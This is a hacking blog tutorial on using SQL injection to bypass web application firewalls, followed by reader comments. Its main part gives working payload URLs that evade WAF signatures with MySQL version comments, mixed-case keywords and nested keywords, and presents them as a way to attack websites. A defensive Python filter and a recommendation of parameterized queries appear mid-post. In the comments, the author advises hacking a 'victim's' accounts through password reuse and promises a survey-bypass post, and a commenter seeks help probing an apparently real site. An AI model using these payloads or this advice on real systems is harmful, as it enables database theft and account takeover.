SQL Injection Part 5 – Bypassing WAF

In my previous posts, I explained different types of SQL injection. Sometimes, when we try to retrieve data from SQLi-vulnerable websites, we end up with a Forbidden error. Today I will explain why you get such errors and how you can bypass them and perform successful attacks on websites. If you have not read my previous posts and are new to SQLi, I suggest you read them before proceeding.


You can read them from here.

What is a WAF?
WAF stands for Web Application Firewall. To prevent attacks such as SQLi and XSS, administrators deploy Web Application Firewalls. These WAFs detect malicious attempts using signature-based filters and escapes defined in a list of rules. As a result of this design, they are vulnerable: input that does not match a listed signature is let through, so they can be easily bypassed.

How does it work?
When the WAF detects a malicious attempt, the request URL returns a Forbidden error, as shown in the following figure.


Our aim is to bypass this error and retrieve data from the database using some special techniques. There are many methods to bypass a WAF. In this tutorial, I am going to show you some basic methods, which are especially suited to beginners.


Methods To Bypass WAF
Comments:-
Comments allow us to bypass a lot of the restrictions of web application firewalls, and to terminate an SQL statement so that the attacker's commands execute while the rest of the legitimate query is commented out.

Actual query
http://vulnerablesite.com/detail.php?id=44 union all select 1,2,3,4,5--

Query to bypass the WAF
http://vulnerablesite.com/detail.php?id=44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5--


Capitalization Of Functions:-
Some WAFs match only lowercase keywords, so changing the case of the keywords evades the filter.

Actual query
http://vulnerablesite.com/detail.php?id=44 UNION SELECT 1,2,3,4,5--
Query to bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 uNiOn SeLeCt 1,2,3,4,5--

Replaced Keywords:-
Some WAFs escape (filter out) certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by embedding the detected word inside another copy of itself, so that the keyword reappears once the inner copy is removed.

Actual query
http://vulnerablesite.com/detail.php?id=-1 UNION SELECT 1,2,3,4,5--
Query to bypass the WAF
http://vulnerablesite.com/detail.php?id=-1 UNIunionON SEselectLECT 1,2,3,4,5--
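
From the defender's side, the three methods above all exploit a filter that inspects the raw request text instead of what the database will parse. The following is an added example, not code from the original post: the function names, the weak filter and the sample table are hypothetical, and the samples are the id values of the three bypass URLs above. It shows the weak rule missing all three, and a rule that normalizes first catching them.

```python
import re
from urllib.parse import unquote_plus

# Constructed samples: the id values from the three bypass URLs in this post.
SAMPLES = {
    "comments": "44 /*!UNION*/ +/*!ALL*/+/*!SELECT*/+1,2,3,4,5--",
    "case": "-1 uNiOn SeLeCt 1,2,3,4,5--",
    "nested": "-1 UNIunionON SEselectLECT 1,2,3,4,5--",
    "benign": "44",
}

SIGNATURE = re.compile(r"\bunion\s+(?:all\s+)?select\b")
KEYWORDS = re.compile(r"union|select")

def naive_block(value):
    """Weak rule (hypothetical): literal, lowercase-only signature on raw input."""
    return "union select" in value or "union all select" in value

def naive_strip(value):
    """Weak sanitiser (hypothetical): removes lowercase keywords in a single pass."""
    return KEYWORDS.sub("", value)

def normalize(value):
    """Reduce the input to the form the SQL parser would effectively see."""
    text = unquote_plus(value)  # decode %xx and '+'
    # MySQL executes the body of /*! ... */ comments, so keep the body.
    text = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", text, flags=re.S)
    # Plain /* ... */ comments behave like whitespace.
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text.casefold()).strip()

def is_suspicious(value):
    """Match on normalized input, repeating keyword removal until nothing changes."""
    text = normalize(value)
    while True:
        if SIGNATURE.search(text):
            return True
        stripped = KEYWORDS.sub("", text)
        if stripped == text:
            return False
        text = stripped

def report():
    """Return {sample name: (naive_block result, is_suspicious result)}."""
    return {name: (naive_block(v), is_suspicious(v)) for name, v in SAMPLES.items()}

if __name__ == "__main__":
    for name, (naive, hardened) in report().items():
        print(f"{name:9} naive_block={naive!s:5} hardened={hardened}")
```

A rule like this is only a second layer: parameterized queries in the application remove the injection point that all three variants depend on.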


Hope you liked this article. Feel free to leave your comments for further doubts and clarifications.
About the Guest Author:
This article was written by Mr Srinivas. He owns Hackinginception, where he writes articles related to hacking. If you're interested in writing a guest post @Hackaholic, please contact me.


Anonymous

This website is really interesting. Can you write about how to bypass those annoying surveys next time? Hope you can help.

Anonymous

Fantastic articles by Srinivas... I am a fan of yours.

Good boy

Hi Srinivas,

Your articles are almost fantastic. But I would like to know: is there any way that we can hack blogs (like Blogspot and WordPress) by hacking the email addresses of the respective blogs?

srini0x00 said on November 21, 2011 at 12:22 AM :

@Good boy

Bro, the articles I am writing are applicable to websites having independent databases. Blogger is under Google :)
So these methods won't work there.
BTW, if your victim is using the same ID and password for both Blogger and his personal email ID, you can hack it. For that, just follow the methods used for email attacks.

srini0x00 said on November 21, 2011 at 12:26 AM :

@Anonymous
BYPASSING SURVEYS
We will write one soon..
Keep on visiting Hackaholic.. :)

srini0x00 said on November 21, 2011 at 1:30 AM :

@Anonymous
Fantastic Articles by Srinivas... I am being a fan of you

Thank you and keep visiting for more and more stuff.. :)

Sampath said on February 18, 2012 at 9:23 AM :

Srinivas, good tutorial, I am from AP too!

Anonymous

What about .aspx sites? There I did not find a vulnerable id. The site link is like "login.aspx", so please share how I can start on this site.

Thanks

TUSHAR said on August 23, 2012 at 8:53 AM :

Can you give some more ways to bypass WAF?

Man in the middle said on April 16, 2013 at 4:23 AM :

Mr. Srinivas, I thank you for this explanation,

and I want to ask you something.

I have a site, and this site uses ASP.
I tried to put ' at the end of the URL, but when I hit enter the site redirects me to a page named noaccess.php and prints the text "Access Denied". I tried to bypass that by adding a false statement like this:
http://www.vicitmesite.com/scriptfolder/view.asp?id=4%20ANandD%201=2

and I got this error:
Server Error
500 - Internal server error.
There is a problem with the resource you are looking for, and it cannot be displayed.
But I noticed that here there is no redirect; I am still on the same page, view.asp.
How can I bypass this?

And thank you again.

Man in the middle said on May 2, 2013 at 5:50 AM :

Mr. Srinivas, please reply, I'm waiting!!!
